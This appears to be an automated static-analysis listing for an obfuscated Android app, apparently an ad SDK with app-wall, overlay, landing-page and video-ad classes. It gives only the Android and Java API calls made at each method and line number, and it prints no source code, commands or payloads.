API: android.app.Activity->startActivity at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:77 Show source
API: org.json.JSONObject->getInt at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:82 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:88 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:94 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:103 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:111 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:122 Show source
API: org.json.JSONObject-><init> at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:4 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:8 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:15 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:25 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:31 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:37 Show source
API: android.content.Intent-><init> at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:49 Show source
API: android.content.Intent->setFlags at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:52 Show source
API: android.content.Intent->addFlags at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:55 Show source
API: android.content.Intent->addFlags at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:58 Show source
API: android.content.Intent->setAction at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:62 Show source
API: android.content.Intent->putExtra at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:68 Show source
API: android.content.Intent->putExtra at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:72 Show source
API: android.app.Activity->startActivity at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:76 Show source
API: org.json.JSONObject->getInt at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:81 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:87 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:96 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:104 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseAppWallJson:115 Show source
API: java.lang.String->startsWith at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:5 Show source
API: org.json.JSONObject-><init> at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:21 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:25 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:32 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:40 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:50 Show source
API: java.lang.String->equalsIgnoreCase at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:56 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:68 Show source
API: org.json.JSONObject->getInt at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:73 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:79 Show source
API: org.json.JSONObject->getString at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:85 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:91 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:97 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:103 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:109 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:121 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:126 Show source
API: java.lang.String->equalsIgnoreCase at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:132 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:141 Show source
API: java.lang.String->equalsIgnoreCase at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:147 Show source
API: java.lang.StringBuilder-><init> at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:157 Show source
API: java.lang.StringBuilder->append at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:161 Show source
API: java.lang.StringBuilder->append at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:164 Show source
API: java.lang.StringBuilder->toString at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:167 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.parseSmartwallJson:170 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:6 Show source
API: java.lang.System->currentTimeMillis at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:29 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:38 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:50 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->isShowing at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:53 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:61 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startLandingPageAd:88 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startAppWall:6 Show source
API: java.lang.System->currentTimeMillis at com.vxjxu.jkhfn1870.AirPlay.startAppWall:29 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startAppWall:38 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startAppWall:50 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->isShowing at com.vxjxu.jkhfn1870.AirPlay.startAppWall:53 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startAppWall:61 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startAppWall:88 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:9 Show source
API: android.util.Log->i at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:18 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:38 Show source
API: java.lang.Exception->printStackTrace at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:42 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:56 Show source
API: android.os.Environment->getExternalStorageState at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:67 Show source
API: java.lang.String->equalsIgnoreCase at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:73 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->isShowing at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:77 Show source
API: android.util.Log->w at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:85 Show source
API: java.lang.System->currentTimeMillis at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:90 Show source
API: android.util.Log->w at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:104 Show source
API: android.util.Log->w at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:127 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AirPlay.startVideoAd:136 Show source
API: org.json.JSONObject-><init> at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:5 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:9 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:16 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:24 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:32 Show source
API: java.lang.String->equalsIgnoreCase at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:41 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:47 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.showOverlayAd:55 Show source

com.vxjxu.jkhfn1870.AirPlay$8

API: android.content.Intent-><init> at com.vxjxu.jkhfn1870.AirPlay$8.run:7 Show source
API: android.content.Intent->setFlags at com.vxjxu.jkhfn1870.AirPlay$8.run:10 Show source
API: android.content.Intent->addFlags at com.vxjxu.jkhfn1870.AirPlay$8.run:13 Show source
API: android.content.Intent->setAction at com.vxjxu.jkhfn1870.AirPlay$8.run:17 Show source
API: android.content.Intent->putExtra at com.vxjxu.jkhfn1870.AirPlay$8.run:23 Show source
API: android.app.Activity->startActivity at com.vxjxu.jkhfn1870.AirPlay$8.run:28 Show source
API: java.lang.Object-><init> at com.vxjxu.jkhfn1870.AirPlay$8.<init>:4 Show source

com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1

API: android.app.Activity->setTitle at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1.onProgressChanged:8 Show source
API: android.app.Activity->setProgress at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1.onProgressChanged:13 Show source
API: android.webkit.WebView->getUrl at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1.onProgressChanged:19 Show source
API: android.app.Activity->setTitle at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1.onProgressChanged:22 Show source
API: android.webkit.WebChromeClient-><init> at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView$1.<init>:5 Show source

com.vxjxu.jkhfn1870.SmartWallActivity$2

API: java.lang.Object-><init> at ..:3 Show source
API: android.content.DialogInterface->dismiss at ..:3 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->finish at ..:7 Show source

com.vxjxu.jkhfn1870.SmartWallActivity$AppWall$JavaScriptInterface

API: java.lang.Object-><init> at ..:3 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->access$200 at ..:8 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity$AppWall->dismiss at ..:11 Show source
API: com.vxjxu.jkhfn1870.SmartWallActivity->finish at ..:17 Show source

com.vxjxu.jkhfn1870.VastUtils

API: java.lang.Integer->toString at ..:7 Show source
API: java.lang.Integer->toString at ..:15 Show source
API: java.lang.Integer->toString at ..:21 Show source
API: java.lang.String->length at ..:29 Show source
API: java.lang.StringBuilder-><init> at ..:35 Show source
API: java.lang.StringBuilder->append at ..:39 Show source
API: java.lang.StringBuilder->append at ..:42 Show source
API: java.lang.StringBuilder->toString at ..:45 Show source
API: java.lang.String->length at ..:48 Show source
API: java.lang.StringBuilder-><init> at ..:54 Show source
API: java.lang.StringBuilder->append at ..:58 Show source
API: java.lang.StringBuilder->append at ..:61 Show source
API: java.lang.StringBuilder->toString at ..:64 Show source
API: java.lang.String->length at ..:67 Show source
API: java.lang.StringBuilder-><init> at ..:73 Show source
API: java.lang.StringBuilder->append at ..:77 Show source
API: java.lang.StringBuilder->append at ..:80 Show source
API: java.lang.StringBuilder->toString at ..:83 Show source
API: java.lang.String->equals at ..:90 Show source
API: java.lang.StringBuilder-><init> at ..:95 Show source
API: java.lang.StringBuilder->append at ..:97 Show source
API: java.lang.StringBuilder->append at ..:102 Show source
API: java.lang.StringBuilder->append at ..:105 Show source
API: java.lang.StringBuilder->append at ..:110 Show source
API: java.lang.StringBuilder->append at ..:113 Show source
API: java.lang.StringBuilder->toString at ..:116 Show source
API: java.lang.String->equals at ..:122 Show source
API: java.lang.String->equals at ..:128 Show source
API: java.lang.StringBuilder-><init> at ..:133 Show source
API: java.lang.StringBuilder->append at ..:135 Show source
API: java.lang.StringBuilder->append at ..:140 Show source
API: java.lang.StringBuilder->append at ..:143 Show source
API: java.lang.StringBuilder->toString at ..:146 Show source
API: java.lang.StringBuilder-><init> at ..:151 Show source
API: java.lang.StringBuilder->append at ..:153 Show source
API: java.lang.StringBuilder->append at ..:158 Show source
API: java.lang.StringBuilder->toString at ..:161 Show source
API: java.lang.String->equals at ..:15 Show source
API: java.lang.NullPointerException-><init> at ..:22 Show source
API: java.util.StringTokenizer-><init> at ..:31 Show source
API: java.util.StringTokenizer->nextToken at ..:33 Show source
API: java.util.StringTokenizer->nextToken at ..:36 Show source
API: java.util.StringTokenizer->nextToken at ..:39 Show source
API: java.lang.StringBuilder-><init> at ..:45 Show source
API: java.lang.StringBuilder->append at ..:48 Show source
API: java.lang.StringBuilder->append at ..:53 Show source
API: java.lang.StringBuilder->append at ..:57 Show source
API: java.lang.StringBuilder->append at ..:62 Show source
API: java.lang.StringBuilder->append at ..:67 Show source
API: java.lang.StringBuilder->toString at ..:70 Show source
API: java.io.PrintStream->println at ..:73 Show source
API: java.lang.String->contains at ..:81 Show source
API: java.util.StringTokenizer-><init> at ..:91 Show source
API: java.util.StringTokenizer->nextToken at ..:93 Show source
API: java.util.StringTokenizer->nextToken at ..:96 Show source
API: java.lang.Long->valueOf at ..:99 Show source
API: java.lang.Long->longValue at ..:102 Show source
API: java.lang.Long->valueOf at ..:109 Show source
API: java.lang.Long->longValue at ..:112 Show source
API: java.lang.Long->valueOf at ..:119 Show source
API: java.lang.Long->longValue at ..:122 Show source
API: java.lang.Long->valueOf at ..:127 Show source
API: java.lang.Long->longValue at ..:130 Show source
API: java.lang.Object-><init> at ..:2 Show source
API: java.io.File->isDirectory at ..:3 Show source